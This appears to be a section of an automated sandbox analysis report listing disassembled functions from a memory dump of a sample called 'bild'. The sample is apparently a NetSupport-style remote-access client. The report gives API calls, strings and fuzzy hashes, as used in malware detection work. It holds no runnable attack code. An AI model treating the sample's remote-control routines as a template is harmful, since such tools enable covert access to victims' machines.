                                                                                      • String ID:
                                                                                      • API String ID: 4245181967-0
                                                                                      • Opcode ID: 838e7dc6d1b1be8e942fea838f017d3d945d3eacabb2bdd9570b2d4d2d73d52c
                                                                                      • Instruction ID: c3d26e7f0e5f190f00e8d03b3c013bb68f2031b9d5661d68f26c10068d749f7e
                                                                                      • Opcode Fuzzy Hash: 838e7dc6d1b1be8e942fea838f017d3d945d3eacabb2bdd9570b2d4d2d73d52c
                                                                                      • Instruction Fuzzy Hash: 6391F6B5A0060A9FDB14DFB4D588AEEF7F5FB88314F10452ED86A9B244E735B841CB60
                                                                                      Function 11025122 Relevance: 12.1, APIs: 8, Instructions: 121windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowTextA.USER32(?,?,00000050), ref: 11025176
                                                                                      • _strncat.LIBCMT ref: 1102518B
                                                                                      • SetWindowTextA.USER32(?,?), ref: 11025198
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • GetDlgItemTextA.USER32(?,00001395,?,00000040), ref: 11025224
                                                                                      • GetDlgItemTextA.USER32(?,00001397,?,00000040), ref: 11025238
                                                                                      • SetDlgItemTextA.USER32(?,00001397,?), ref: 11025250
                                                                                      • SetDlgItemTextA.USER32(?,00001395,?), ref: 11025262
                                                                                      • SetFocus.USER32(?), ref: 11025265
                                                                                        • Part of subcall function 11024C70: GetDlgItem.USER32(?,?), ref: 11024CC0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Text$Item$Window$Focus_malloc_memset_strncatwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 3832070631-0
                                                                                      • Opcode ID: 60fab7655721e0b3046f2d3ba99d2d3761f65fbfa148eacead4071a3fd212dff
                                                                                      • Instruction ID: 7712de199883e751ea03bfa735f50b434bc7bb1cc5edca5bff12a9cf5cd7df4a
                                                                                      • Opcode Fuzzy Hash: 60fab7655721e0b3046f2d3ba99d2d3761f65fbfa148eacead4071a3fd212dff
                                                                                      • Instruction Fuzzy Hash: 0E4192B5A10359ABE710DB74CC45BBAF7F8FB44714F01452AE61AD76C0EAB4A904CB50
                                                                                      Function 110573B0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 188libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(111ED708,A1BC2D8B,1110EDDD,00000000,00000000,00000000,E8111B5E,111825D3,000000FF,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000), ref: 1107602E
                                                                                        • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(0000000C,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,A1BC2D8B,00000000,00000001,00000000,00000000,1118A168,000000FF), ref: 11076097
                                                                                        • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(00000024,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,A1BC2D8B,00000000,00000001,00000000,00000000,1118A168,000000FF), ref: 1107609D
                                                                                        • Part of subcall function 11075FE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,A1BC2D8B,00000000,00000001,00000000,00000000), ref: 110760A7
                                                                                        • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(000004D0,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,A1BC2D8B,00000000,00000001,00000000,00000000), ref: 110760FC
                                                                                        • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(000004F8,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,A1BC2D8B,00000000,00000001,00000000,00000000), ref: 11076105
                                                                                      • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1105759C
                                                                                      • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 110575E1
                                                                                      • SetLastError.KERNEL32(00000078), ref: 110575F4
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 110575FF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalInitializeSection$Library$AddressCreateErrorEventFreeLastLoadProc
                                                                                      • String ID: Kernel32.dll$WTSGetActiveConsoleSessionId
                                                                                      • API String ID: 3780373956-3165951319
                                                                                      • Opcode ID: ccdea510e774544ecb2f96d5e0f14d7635a3fa6427d5c0afb47a3670e03c907f
                                                                                      • Instruction ID: 5b2845002196474fabc536bb645ff26533f5159a1a467828fb1dae30e08bae14
                                                                                      • Opcode Fuzzy Hash: ccdea510e774544ecb2f96d5e0f14d7635a3fa6427d5c0afb47a3670e03c907f
                                                                                      • Instruction Fuzzy Hash: C47149B4A01215AFDB10CFAAC8C0E9AFBF9FF88314F24819AE91597314D771A941CF64
                                                                                      Function 11093180 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 110CEC60: CreateDialogParamA.USER32(00000000,?,1112D7C9,110CBCD0,00000000), ref: 110CECF1
                                                                                        • Part of subcall function 110CEC60: GetLastError.KERNEL32 ref: 110CEE49
                                                                                        • Part of subcall function 110CEC60: wsprintfA.USER32 ref: 110CEE78
                                                                                        • Part of subcall function 11142DD0: _memset.LIBCMT ref: 11142DF9
                                                                                        • Part of subcall function 11142DD0: GetVersionExA.KERNEL32(?), ref: 11142E12
                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 110931C9
                                                                                      • SetWindowLongA.USER32(?,000000EC,00000000), ref: 110931F7
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 11093220
                                                                                      • SetWindowLongA.USER32(?,000000F0,00000000), ref: 1109324E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LongWindow$ErrorLastwsprintf$CreateDialogExitMessageParamProcessVersion_memset
                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                      • API String ID: 3136964118-2830328467
                                                                                      • Opcode ID: fb6c2165198b052ed1adde41c8e51930884ee91b5ce78e92da16114a67f0499d
                                                                                      • Instruction ID: 17cdb21e99cc57644c55c5a770e75091ec79e40792fa9a2895745f392d232910
                                                                                      • Opcode Fuzzy Hash: fb6c2165198b052ed1adde41c8e51930884ee91b5ce78e92da16114a67f0499d
                                                                                      • Instruction Fuzzy Hash: AF31E475B04609ABC324CFA5DC95FE7B3E5BB88718F10862CF56A976D0DA34B840CB54
                                                                                      Function 11137070 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 104COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _malloc.LIBCMT ref: 111370A6
                                                                                      • _free.LIBCMT ref: 111370DD
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • _free.LIBCMT ref: 1113716D
                                                                                        • Part of subcall function 1110F270: InterlockedDecrement.KERNEL32(?), ref: 1110F278
                                                                                      • _free.LIBCMT ref: 1113713E
                                                                                        • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                        • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _free$DecrementErrorFreeHeapInterlockedLast__wcstoi64_malloc
                                                                                      • String ID: *HelpReqServer$Client
                                                                                      • API String ID: 1390041139-3616015116
                                                                                      • Opcode ID: 71aa43b1dfc4152375353722706e6e213d6d63b076ebc57cc88b85f2b8b4d0b4
                                                                                      • Instruction ID: 8e3468a70864abf3cc9909560d123acfb2a7f2167445c6f0ed38d11247114e31
                                                                                      • Opcode Fuzzy Hash: 71aa43b1dfc4152375353722706e6e213d6d63b076ebc57cc88b85f2b8b4d0b4
                                                                                      • Instruction Fuzzy Hash: 6B313877B001156BDB00DE58DC81BAEF3A9EF88325F154169ED04AB380D675F904C7D5
                                                                                      Function 11143360 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • PlaySoundA.WINMM(1000,50,00000000,00020001), ref: 11143451
                                                                                        • Part of subcall function 11163A2D: __isdigit_l.LIBCMT ref: 11163A52
                                                                                      • Beep.KERNEL32(00000000,00000000), ref: 11143415
                                                                                      • MessageBeep.USER32(00000000), ref: 11143427
                                                                                      • MessageBeep.USER32(-00000010), ref: 1114343B
                                                                                      • MessageBeep.USER32(00000000), ref: 1114345D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Beep$Message$PlaySound__isdigit_l
                                                                                      • String ID: 1000,50
                                                                                      • API String ID: 3904670044-1941404556
                                                                                      • Opcode ID: c2824c85be99af7b01869709431b37e6f937a4a8314b06dcce6d67a3277ac74e
                                                                                      • Instruction ID: 938a5c7d7fad482dacf885287002a424905fd2e62ab59dfe834b6d95de8c57fd
                                                                                      • Opcode Fuzzy Hash: c2824c85be99af7b01869709431b37e6f937a4a8314b06dcce6d67a3277ac74e
                                                                                      • Instruction Fuzzy Hash: 93216D66A6C6B272E60105746D847FFFF5E8F81E69F184074E87DC6982EB26E016C321
                                                                                      Function 110B9000 Relevance: 10.6, APIs: 7, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetForegroundWindow.USER32(75BF7AA0,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9017
                                                                                      • GetCursorPos.USER32(110BFEBC), ref: 110B9026
                                                                                        • Part of subcall function 1115E6F0: GetWindowRect.USER32(?,?), ref: 1115E70C
                                                                                      • PtInRect.USER32(110BFEBC,110BFEBC,110BFEBC), ref: 110B9044
                                                                                      • ClientToScreen.USER32(?,110BFEBC), ref: 110B9066
                                                                                      • SetCursorPos.USER32(110BFEBC,110BFEBC,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9074
                                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 110B9081
                                                                                      • SetCursor.USER32(00000000,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9088
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Cursor$RectWindow$ClientForegroundLoadScreen
                                                                                      • String ID:
                                                                                      • API String ID: 3235510773-0
                                                                                      • Opcode ID: 49be05b7fef80b05594cc908f0611ebf12c6680a206dc75da7e7ca7dce7ec318
                                                                                      • Instruction ID: ad301b5eb86ee9d8d5bbe419ceb9c49b4424cf1b2c79503272c3df1ff599c8d2
                                                                                      • Opcode Fuzzy Hash: 49be05b7fef80b05594cc908f0611ebf12c6680a206dc75da7e7ca7dce7ec318
                                                                                      • Instruction Fuzzy Hash: 8C112EB5E1421A9FCB08DFB4C884DBFF7B8FB84305B108669E52297244DB34E905CBA4
                                                                                      Function 1101D0F0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrywindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 1101D0FE
                                                                                      • LoadIconA.USER32(00000000,0000139A), ref: 1101D14F
                                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 1101D15F
                                                                                      • RegisterClassExA.USER32(00000030), ref: 1101D181
                                                                                      • GetLastError.KERNEL32 ref: 1101D187
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Load$ClassCursorErrorIconLastRegister_memset
                                                                                      • String ID: 0
                                                                                      • API String ID: 430917334-4108050209
                                                                                      • Opcode ID: a999cde5bf51422c53d54c5e2b81da0a739011e508cf178ac43a94cfc9df5e13
                                                                                      • Instruction ID: 594e7871e039520b7580a936d726e641a3743c14917196a6b4ce4aa29f199296
                                                                                      • Opcode Fuzzy Hash: a999cde5bf51422c53d54c5e2b81da0a739011e508cf178ac43a94cfc9df5e13
                                                                                      • Instruction Fuzzy Hash: 9C018C74C1431DABEF00EFF0C899BDEFBB8AB04708F104029E521BA284E7BA51048F95
                                                                                      Function 11003310 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadMenuA.USER32(00000000,00002EFD), ref: 1100331D
                                                                                      • GetSubMenu.USER32(00000000,00000000), ref: 11003343
                                                                                      • DestroyMenu.USER32(00000000), ref: 11003372
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                      • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                      • API String ID: 468487828-934300333
                                                                                      • Opcode ID: e42f28694fc46f4086300125048bfedf8bbbd82d4e050df1718e76ccc8693524
                                                                                      • Instruction ID: e80103f9713123d07a9bceb05cb6f887813353322251b2c4d1aa2998eabbc516
                                                                                      • Opcode Fuzzy Hash: e42f28694fc46f4086300125048bfedf8bbbd82d4e050df1718e76ccc8693524
                                                                                      • Instruction Fuzzy Hash: E5F0A73EF9466933D31666F53D1AF4BAB485B815ACB060031F524EA740EE14B4018166
                                                                                      Function 11147110 Relevance: 9.0, APIs: 6, Instructions: 48threadsynchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • OpenThread.KERNEL32(0000004A,00000000,11147278,?,?,?,?,?,11147278), ref: 1114713A
                                                                                      • CreateThread.KERNEL32(00000000,00001000,111470B0,?,00000000,?), ref: 1114715E
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,11147278), ref: 11147169
                                                                                      • GetExitCodeThread.KERNEL32(00000000,00000000,?,?,?,?,?,?,11147278), ref: 11147174
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,11147278), ref: 11147181
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,11147278), ref: 11147187
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
